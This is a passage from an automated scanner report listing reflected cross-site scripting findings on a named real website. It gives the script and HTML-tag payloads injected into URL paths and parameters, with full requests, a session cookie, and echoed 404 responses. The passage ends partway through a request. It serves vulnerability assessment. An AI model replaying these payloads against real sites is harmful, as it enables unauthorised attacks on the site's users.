2.371. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37176<script>alert(1)</script>5d8f33aa638 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images37176<script>alert(1)</script>5d8f33aa638/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images37176<script>alert(1)</script>5d8f33aa638/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.372. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fa61c<script>alert(1)</script>e58ac79bcf5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratingfa61c<script>alert(1)</script>e58ac79bcf5/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratingfa61c<script>alert(1)</script>e58ac79bcf5/4half.gif was not found on this server.</p>
...[SNIP]...

2.373. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dfff2<script>alert(1)</script>8a0ee3a997c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4half.gifdfff2<script>alert(1)</script>8a0ee3a997c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4half.gifdfff2<script>alert(1)</script>8a0ee3a997c was not found on this server.</p>
...[SNIP]...

2.374. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab350<script>alert(1)</script>f5700d6f99e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4half.gif?ab350<script>alert(1)</script>f5700d6f99e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4half.gif?ab350<script>alert(1)</script>f5700d6f99e=1 was not found on this server.</p>
...[SNIP]...

2.375. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f67f<script>alert(1)</script>fda7dc51277 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1f67f<script>alert(1)</script>fda7dc51277/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1f67f<script>alert(1)</script>fda7dc51277/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.376. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f1ea<script>alert(1)</script>37dd6b01ec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes7f1ea<script>alert(1)</script>37dd6b01ec7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes7f1ea<script>alert(1)</script>37dd6b01ec7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.377. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d5f6<script>alert(1)</script>df3745797cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos7d5f6<script>alert(1)</script>df3745797cf/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos7d5f6<script>alert(1)</script>df3745797cf/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.378. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15eb5<script>alert(1)</script>7ae7aab5b50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images15eb5<script>alert(1)</script>7ae7aab5b50/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images15eb5<script>alert(1)</script>7ae7aab5b50/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.379. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 36afc<script>alert(1)</script>0ae68875371 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating36afc<script>alert(1)</script>0ae68875371/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating36afc<script>alert(1)</script>0ae68875371/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.380. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 37f93<script>alert(1)</script>3cd2de9f595 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/search.php37f93<script>alert(1)</script>3cd2de9f595?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php37f93<script>alert(1)</script>3cd2de9f595?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.381. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7da82<a>d417c458cde was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7da82<a>d417c458cde&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7da82<a>d417c458cde&opt=2 was not found on this server.</p>
...[SNIP]...

2.382. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7e92e<a>d91d410511 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...7e92e<a>d91d410511&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...7e92e<a>d91d410511&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.383. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2fa1d<script>alert(1)</script>1ebb0f096e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2fa1d<script>alert(1)</script>1ebb0f096e8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2fa1d<script>alert(1)</script>1ebb0f096e8=1 was not found on this server.</p>
...[SNIP]...

2.384. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b7a79<a>0b7bf14024a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b7a79<a>0b7bf14024a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2b7a79<a>0b7bf14024a was not found on this server.</p>
...[SNIP]...

2.385. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a7de<script>alert(1)</script>bfa801f502d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult4a7de<script>alert(1)</script>bfa801f502d/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult4a7de<script>alert(1)</script>bfa801f502d/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.386. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 95f50<script>alert(1)</script>dda8e7abf8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes95f50<script>alert(1)</script>dda8e7abf8a/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes95f50<script>alert(1)</script>dda8e7abf8a/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.387. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d549<script>alert(1)</script>c6de83bfec9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos6d549<script>alert(1)</script>c6de83bfec9/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos6d549<script>alert(1)</script>c6de83bfec9/images/review/ was not found on this server.</p>
...[SNIP]...

2.388. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24da4<script>alert(1)</script>d54d62721ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images24da4<script>alert(1)</script>d54d62721ec/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images24da4<script>alert(1)</script>d54d62721ec/review/ was not found on this server.</p>
...[SNIP]...

2.389. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 880ce<script>alert(1)</script>b3d649fde8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review880ce<script>alert(1)</script>b3d649fde8e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
